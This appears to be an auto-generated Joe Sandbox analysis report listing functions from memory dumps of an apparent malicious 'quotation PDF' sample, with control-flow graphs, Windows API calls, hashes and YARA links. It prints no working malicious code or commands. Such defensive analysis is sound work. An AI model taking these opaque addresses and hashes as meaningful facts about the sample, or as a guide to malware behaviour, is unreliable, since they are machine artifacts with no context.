                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 2f0d89834f56a110a3c077b48f114ee6d852be4a2f388c79c18330e63bbc654d
                                                        • Instruction ID: bc8699bbb93f8313f380cd1644972668528e3d851058c40b7199600c35d42b16
                                                        • Opcode Fuzzy Hash: 2f0d89834f56a110a3c077b48f114ee6d852be4a2f388c79c18330e63bbc654d
                                                        • Instruction Fuzzy Hash: 96814470A00B058FD765DF2AD44079ABBF1BB88304F058A2EE95ADBB41DB34E845CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 066254A8 Relevance: 1.7, APIs: 1, Instructions: 178libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1576 66254a8-66254c7 1577 66254c9-66254d3 1576->1577 1578 66254ec-66254f9 1576->1578 1579 66254d5-66254e6 1577->1579 1580 66254e8-66254eb 1577->1580 1582 6625542-662554d 1578->1582 1583 66254fb-662553f 1578->1583 1579->1580 1586 6625554 1582->1586 1583->1582 1587 662555b-6625572 LdrInitializeThunk 1586->1587 1589 66256bb-66256d8 1587->1589 1590 6625578-6625592 1587->1590 1604 66256dd-66256e6 1589->1604 1590->1589 1594 6625598-66255b2 1590->1594 1600 66255b4-66255b6 1594->1600 1601 66255b8 1594->1601 1602 66255bb-6625616 1600->1602 1601->1602 1611 6625618-662561a 1602->1611 1612 662561c 1602->1612 1613 662561f-66256b9 1611->1613 1612->1613 1613->1604
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b393ca7f7efd7ba406129033b33883ce2c886145d889b758a9fe8bacb1ddeb95
                                                        • Instruction ID: 934af5172208dbaf3d062ae457b055ce3b43cb0cd3d6397c84ccb9611554d7c7
                                                        • Opcode Fuzzy Hash: b393ca7f7efd7ba406129033b33883ce2c886145d889b758a9fe8bacb1ddeb95
                                                        • Instruction Fuzzy Hash: 4A51D430A102459FCB50EB74D854AEEBBB6FF85304F14896AE502DB795EF30DC098BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06625508 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1630 6625508-6625572 LdrInitializeThunk 1638 66256bb-66256d8 1630->1638 1639 6625578-6625592 1630->1639 1650 66256dd-66256e6 1638->1650 1639->1638 1642 6625598-66255b2 1639->1642 1646 66255b4-66255b6 1642->1646 1647 66255b8 1642->1647 1648 66255bb-6625616 1646->1648 1647->1648 1657 6625618-662561a 1648->1657 1658 662561c 1648->1658 1659 662561f-66256b9 1657->1659 1658->1659 1659->1650
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b1aba51dbe13dc033ddd74828aee1971d8550b6967ab783b97fcd636b46159d8
                                                        • Instruction ID: 86e9623dc83391e1a9aab1a6d31a4e2814cbfa8f7abf579d7307c918344803d8
                                                        • Opcode Fuzzy Hash: b1aba51dbe13dc033ddd74828aee1971d8550b6967ab783b97fcd636b46159d8
                                                        • Instruction Fuzzy Hash: 7151A430A102059FCB54EBB4D894AAEB7F6FF85304F148969D512DB794EF30EC498BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06456479 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1676 6456479-645648c 1677 64564c6-645653e 1676->1677 1678 645648e-64564b8 call 64537a4 1676->1678 1680 6456540-6456546 1677->1680 1681 6456549-6456550 1677->1681 1682 64564bd-64564be 1678->1682 1680->1681 1683 6456552-6456558 1681->1683 1684 645655b-64565fa CreateWindowExW 1681->1684 1683->1684 1686 6456603-645663b 1684->1686 1687 64565fc-6456602 1684->1687 1691 645663d-6456640 1686->1691 1692 6456648 1686->1692 1687->1686 1691->1692 1693 6456649 1692->1693 1693->1693
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064565EA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: 48385ba8accb609f282f0036b3ef004a1209335291c90cc62fc22b7b3e5a537d
                                                        • Instruction ID: c57fd9ee9ea6da372f49f8cfd090d0a157f3bdf0c89a78f14d700c67593f6336
                                                        • Opcode Fuzzy Hash: 48385ba8accb609f282f0036b3ef004a1209335291c90cc62fc22b7b3e5a537d
                                                        • Instruction Fuzzy Hash: C451F1B1D00249EFDF02CFA9C984ADDBFB2BF48314F15816AE818AB221D7719855CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 066250CA Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1694 66250ca-66250d1 1695 66250d3-66250e5 1694->1695 1696 662511a-6625127 1694->1696 1697 66250e7-66250e9 1695->1697 1698 6625129-6625133 1696->1698 1699 662514c-66251d1 1696->1699 1700 66250f0-66250f3 1697->1700 1701 66250eb 1697->1701 1702 6625135-6625146 1698->1702 1703 6625148-662514b 1698->1703 1710 66251d3-66251d6 1699->1710 1711 66251d9-66251e3 1699->1711 1705 66250f5-6625101 1700->1705 1706 66250dd-66250e0 1700->1706 1701->1700 1702->1703 1706->1697 1707 66250e2 1706->1707 1707->1697 1710->1711 1712 66251e5-66251ed 1711->1712 1713 66251ef-6625231 RegQueryValueExW 1711->1713 1712->1713 1714 6625233-6625239 1713->1714 1715 662523a-6625274 1713->1715 1714->1715 1719 6625276 1715->1719 1720 662527e 1715->1720 1719->1720 1721 662527f 1720->1721 1721->1721
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a65e66eb9ddb228f5152a12954773da8e30bc0ea8cc37fac328b193901fe707a
                                                        • Instruction ID: 2399240c89b1d8477103f454d890d2b24da71fae417f648cc853109748325593
                                                        • Opcode Fuzzy Hash: a65e66eb9ddb228f5152a12954773da8e30bc0ea8cc37fac328b193901fe707a
                                                        • Instruction Fuzzy Hash: 78516BB5E012599FCB20CFA9C984ADEBFF5AF48304F14806AE819EB351D7309945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06625108 Relevance: 1.6, APIs: 1, Instructions: 137registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1722 6625108-6625111 1723 6625113-6625114 1722->1723 1724 662515a-66251c3 1722->1724 1726 6625116-6625127 1723->1726 1727 66250cf-66250e5 1723->1727 1725 66251cb-66251d1 1724->1725 1728 66251d3-66251d6 1725->1728 1729 66251d9-66251e3 1725->1729 1731 6625129-6625133 1726->1731 1732 662514c-66251c3 1726->1732 1730 66250e7-66250e9 1727->1730 1728->1729 1733 66251e5-66251ed 1729->1733 1734 66251ef-6625231 RegQueryValueExW 1729->1734 1735 66250f0-66250f3 1730->1735 1736 66250eb 1730->1736 1737 6625135-6625146 1731->1737 1738 6625148-662514b 1731->1738 1732->1725 1733->1734 1740 6625233-6625239 1734->1740 1741 662523a-6625274 1734->1741 1742 66250f5-6625101 1735->1742 1743 66250dd-66250e0 1735->1743 1736->1735 1737->1738 1740->1741 1749 6625276 1741->1749 1750 662527e 1741->1750 1743->1730 1744 66250e2 1743->1744 1744->1730 1749->1750 1751 662527f 1750->1751 1751->1751
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06625221
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: a0fb37a59135a39946bfc0fad29f2fad55603fde4e474f4dec073ee3a919dabc
                                                        • Instruction ID: 22b468b47599686a686323ce5cee37552bae10aa70583f21e8b5f674f188fc04
                                                        • Opcode Fuzzy Hash: a0fb37a59135a39946bfc0fad29f2fad55603fde4e474f4dec073ee3a919dabc
                                                        • Instruction Fuzzy Hash: 6B517EB5D053599FCB20CF99C984ADEBFF5AF49304F14806AE81AAB351D7309945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06624E50 Relevance: 1.6, APIs: 1, Instructions: 123registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1752 6624e50-6624e58 1753 6624e5a-6624e6f 1752->1753 1754 6624ec8-6624f00 1752->1754 1757 6624e71-6624e7b 1753->1757 1758 6624e94-6624ea8 1753->1758 1755 6624f02-6624f05 1754->1755 1756 6624f08 1754->1756 1755->1756 1762 6624f12-6624f16 1756->1762 1759 6624e90-6624e93 1757->1759 1760 6624e7d-6624e8e 1757->1760 1763 6624eaa-6624ec7 1758->1763 1764 6624f19-6624f74 RegOpenKeyExW 1758->1764 1760->1759 1762->1764 1763->1754 1766 6624f76-6624f7c 1764->1766 1767 6624f7d-6624fb5 1764->1767 1766->1767 1771 6624fb7-6624fc0 1767->1771 1772 6624fc8 1767->1772 1771->1772 1773 6624fc9 1772->1773 1773->1773
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06624F64
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: b68625a9bc778026b16bbe90832aad82edbdddcf5ac906d10357bd0b0d915179
                                                        • Instruction ID: 28f036924ef5ac284f0a16bf7a167d6bb06f7f1f1bb964fbfa89a5068a268c64
                                                        • Opcode Fuzzy Hash: b68625a9bc778026b16bbe90832aad82edbdddcf5ac906d10357bd0b0d915179
                                                        • Instruction Fuzzy Hash: 95414670D053898FDB10CF99C544B8EBFF5AF88304F29816AE409AB341DB749885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 064537A4 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1774 64537a4-645653e 1776 6456540-6456546 1774->1776 1777 6456549-6456550 1774->1777 1776->1777 1778 6456552-6456558 1777->1778 1779 645655b-64565fa CreateWindowExW 1777->1779 1778->1779 1781 6456603-645663b 1779->1781 1782 64565fc-6456602 1779->1782 1786 645663d-6456640 1781->1786 1787 6456648 1781->1787 1782->1781 1786->1787 1788 6456649 1787->1788 1788->1788
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 064565EA
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: ecb9b84ed34ac7b1ea8de85123e47059f3533af1115a50240597a0892f1de9a5
                                                        • Instruction ID: 484939396e04011858ceb7bcc8e6edc11b23b2beefc349166210ba6a7d75b5d9
                                                        • Opcode Fuzzy Hash: ecb9b84ed34ac7b1ea8de85123e47059f3533af1115a50240597a0892f1de9a5
                                                        • Instruction Fuzzy Hash: D351DFB1D00309EFDB14CF99C984ADEBBB5FF48314F65812AE819AB211D774A885CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06453894 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1789 6453894-6458c3c 1792 6458c42-6458c47 1789->1792 1793 6458cec-6458d0c call 64537cc 1789->1793 1794 6458c49-6458c80 1792->1794 1795 6458c9a-6458cd2 CallWindowProcW 1792->1795 1800 6458d0f-6458d1c 1793->1800 1803 6458c82-6458c88 1794->1803 1804 6458c89-6458c98 1794->1804 1797 6458cd4-6458cda 1795->1797 1798 6458cdb-6458cea 1795->1798 1797->1798 1798->1800 1803->1804 1804->1800
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 06458CC1
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: 572a6b47e3ec37c57b633f9071029faf7b0e7506e4c9522a42ded3d826344886
                                                        • Instruction ID: 4dec8c5027ee8b0bbb8579f3a4ad694c2f60db1d24b0642f4f8bde8ed14380c5
                                                        • Opcode Fuzzy Hash: 572a6b47e3ec37c57b633f9071029faf7b0e7506e4c9522a42ded3d826344886
                                                        • Instruction Fuzzy Hash: C4415AB4A00215DFDB51CF89C488AAABBF5FF88314F25C55AD419AB321DB34A845CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06498F28 Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1806 6498f28-6498fc6 1815 6498fcf-6498fe4 LdrInitializeThunk 1806->1815 1816 6498feb-6498ff7 1815->1816 1817 6498ffd-6499006 1816->1817 1818 6499215-6499228 1816->1818 1819 649924a 1817->1819 1820 649900c-6499021 1817->1820 1821 649924f-6499253 1818->1821 1819->1821 1825 649903b-6499056 1820->1825 1826 6499023-6499036 1820->1826 1822 649925e 1821->1822 1823 6499255 1821->1823 1827 649925f 1822->1827 1823->1822 1835 6499058-6499062 1825->1835 1836 6499064 1825->1836 1828 64991e9-64991ed 1826->1828 1827->1827 1829 64991f8 1828->1829 1830 64991ef 1828->1830 1832 64991f9 1829->1832 1830->1829 1832->1832 1837 6499069-649906b 1835->1837 1836->1837 1838 649906d-6499080 1837->1838 1839 6499085-6499120 1837->1839 1838->1828 1857 649912e 1839->1857 1858 6499122-649912c 1839->1858 1859 6499133-6499135 1857->1859 1858->1859 1860 6499193-64991e7 1859->1860 1861 6499137-6499139 1859->1861 1860->1828 1862 649913b-6499145 1861->1862 1863 6499147 1861->1863 1865 649914c-649914e 1862->1865 1863->1865 1865->1860 1866 6499150-6499191 1865->1866 1866->1860
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: fa0cb39a380625fbae54d8047ef1c1abc0b883d3b25e6a0a5288246b63895902
                                                        • Instruction ID: e2a9b67dae81175ef7c98c290b0ffa5c924ee83e176230c4ca79498fe86c27b3
                                                        • Opcode Fuzzy Hash: fa0cb39a380625fbae54d8047ef1c1abc0b883d3b25e6a0a5288246b63895902
                                                        • Instruction Fuzzy Hash: 1931EF319042859FDB25EBB4D8A9BDE7FB1FF41308F19886AC041AB351DB35C886CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02D49E18 Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1877 2d49e18-2d4d04f 1879 2d4d051-2d4d05b 1877->1879 1880 2d4d088-2d4d0d2 LoadLibraryA 1877->1880 1879->1880 1881 2d4d05d-2d4d05f 1879->1881 1885 2d4d0d4-2d4d0da 1880->1885 1886 2d4d0db-2d4d10c 1880->1886 1883 2d4d061-2d4d06b 1881->1883 1884 2d4d082-2d4d085 1881->1884 1887 2d4d06d 1883->1887 1888 2d4d06f-2d4d07e 1883->1888 1884->1880 1885->1886 1892 2d4d11c 1886->1892 1893 2d4d10e-2d4d112 1886->1893 1887->1888 1888->1888 1890 2d4d080 1888->1890 1890->1884 1895 2d4d11d 1892->1895 1893->1892 1894 2d4d114 1893->1894 1894->1892 1895->1895
                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(?), ref: 02D4D0C2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 37209e4c449df4b0d7872fa74538b87be11784379b59b0ae708ef081a2123479
                                                        • Instruction ID: dc662ababf8fcc8b554e4f6e5b02f0b93dc8550f2f5b76b4daa06383fe094b85
                                                        • Opcode Fuzzy Hash: 37209e4c449df4b0d7872fa74538b87be11784379b59b0ae708ef081a2123479
                                                        • Instruction Fuzzy Hash: AE3148B0D002499FDB14CFA8C9857DEBBF2FB08314F24852AE815A7380DB74A846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02D4CFEC Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1896 2d4cfec-2d4d04f 1898 2d4d051-2d4d05b 1896->1898 1899 2d4d088-2d4d0d2 LoadLibraryA 1896->1899 1898->1899 1900 2d4d05d-2d4d05f 1898->1900 1904 2d4d0d4-2d4d0da 1899->1904 1905 2d4d0db-2d4d10c 1899->1905 1902 2d4d061-2d4d06b 1900->1902 1903 2d4d082-2d4d085 1900->1903 1906 2d4d06d 1902->1906 1907 2d4d06f-2d4d07e 1902->1907 1903->1899 1904->1905 1911 2d4d11c 1905->1911 1912 2d4d10e-2d4d112 1905->1912 1906->1907 1907->1907 1909 2d4d080 1907->1909 1909->1903 1914 2d4d11d 1911->1914 1912->1911 1913 2d4d114 1912->1913 1913->1911 1914->1914
                                                        APIs
                                                        • LoadLibraryA.KERNELBASE(?), ref: 02D4D0C2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 9315c85bef3f98165127a941d1236ea52e73080bde8db68923b0b140bd1bb78d
                                                        • Instruction ID: cf6a572fcd5f5582df0e8dd9ad0a7b83c18da1f2f53f8a3a4c5e6ba579ef8454
                                                        • Opcode Fuzzy Hash: 9315c85bef3f98165127a941d1236ea52e73080bde8db68923b0b140bd1bb78d
                                                        • Instruction Fuzzy Hash: 99312AB0D002499FDB14CFA8D9857DEBBF2FB09314F24852AE855A7380DB74A846CF95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06625168 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2534 6625168-66251d1 2536 66251d3-66251d6 2534->2536 2537 66251d9-66251e3 2534->2537 2536->2537 2538 66251e5-66251ed 2537->2538 2539 66251ef-6625231 RegQueryValueExW 2537->2539 2538->2539 2540 6625233-6625239 2539->2540 2541 662523a-6625274 2539->2541 2540->2541 2545 6625276 2541->2545 2546 662527e 2541->2546 2545->2546 2547 662527f 2546->2547 2547->2547
                                                        APIs
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06625221
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        • Opcode ID: b4e0457bcdf3b94f0455061986400672caa78bbbcdba608a6c8172471de0d735
                                                        • Instruction ID: e4552818fe0cb5781def475f46526b2c9c8fe69e1f6f90a5d601e373f1258c33
                                                        • Opcode Fuzzy Hash: b4e0457bcdf3b94f0455061986400672caa78bbbcdba608a6c8172471de0d735
                                                        • Instruction Fuzzy Hash: 9431D0B1D016599FCB20CF99D984ACEBBF5BF48314F15802AE81AAB354D7709945CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06498F02 Relevance: 1.6, APIs: 1, Instructions: 84libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516637474.0000000006490000.00000040.00000800.00020000.00000000.sdmp, Offset: 06490000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6490000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f0c0b23eb35771da099c5ab341f9fa12cb299e96b03234d3fd3c6cb5bcfa220b
                                                        • Instruction ID: 03a681c9e05b0aeac098e3238b95139e5e2e4132cf7b9129888800598c01ff4a
                                                        • Opcode Fuzzy Hash: f0c0b23eb35771da099c5ab341f9fa12cb299e96b03234d3fd3c6cb5bcfa220b
                                                        • Instruction Fuzzy Hash: 0121E1359012499FDB24EFB4C999ADE7FB1FF45348F28886AD001A7350CB35C88ACB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06624EB0 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 06624F64
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516676426.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6620000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: 63f022ad516f6721136b112f24bedb94bf4b79db5e858650e79d14b3007637bc
                                                        • Instruction ID: 08aadc9f6ce78d5abb0aa21cb3bd7bff8c0daeb5f5cc4852399e371587cc3132
                                                        • Opcode Fuzzy Hash: 63f022ad516f6721136b112f24bedb94bf4b79db5e858650e79d14b3007637bc
                                                        • Instruction Fuzzy Hash: 533102B0D042499FDB10CF99C584A8EFFF5BF88304F29816AE409AB345CB759985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02D44CD8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02D44D62
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID:
                                                        • API String ID: 2118026453-0
                                                        • Opcode ID: 4cac77e4e2aa9f2a83d9689ccde7f28fdb9ed780d684e2da7e5ccf5855fc465a
                                                        • Instruction ID: 15e3b83edff89f7114aec6a0787785e7f2466816a36df8a1ba091c51c179c145
                                                        • Opcode Fuzzy Hash: 4cac77e4e2aa9f2a83d9689ccde7f28fdb9ed780d684e2da7e5ccf5855fc465a
                                                        • Instruction Fuzzy Hash: E92156709027458FCB10DFA9D5097AEBBF8FB49314F14856AD405B7701DB386988CFA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06453668 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064546F1,00000800,00000000,00000000), ref: 064548E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 2769ad9ffe042255c6257c6de5756701baf955eacabd255d2792506bc076504f
                                                        • Instruction ID: 7e486df83c52324372531fd6612a4150fec230e3d10acd41d19e988e041bf4e0
                                                        • Opcode Fuzzy Hash: 2769ad9ffe042255c6257c6de5756701baf955eacabd255d2792506bc076504f
                                                        • Instruction Fuzzy Hash: 6A1103B6D002499FCB10CF9AD444ADEFBF4EB48324F05842AD915AB301C775A549CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02D44CE8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlEncodePointer.NTDLL(00000000), ref: 02D44D62
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.513054440.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_2d40000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: EncodePointer
                                                        • String ID:
                                                        • API String ID: 2118026453-0
                                                        • Opcode ID: 50cdf8163eb09104fbeaf1c45db1544f7d4c34a64389e8c2bc269bbf651d4d57
                                                        • Instruction ID: 1967397cbf4751201687327c3e62bdee82f339d80fd072efc489557710a7e40e
                                                        • Opcode Fuzzy Hash: 50cdf8163eb09104fbeaf1c45db1544f7d4c34a64389e8c2bc269bbf651d4d57
                                                        • Instruction Fuzzy Hash: 481156B09017058FCB20DFA9D50879EBBF8FB48314F14852AD406B7700DB39A989CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 06454872 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,064546F1,00000800,00000000,00000000), ref: 064548E2
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.516563121.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6450000_UN-Quotation 70000000187366444_PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
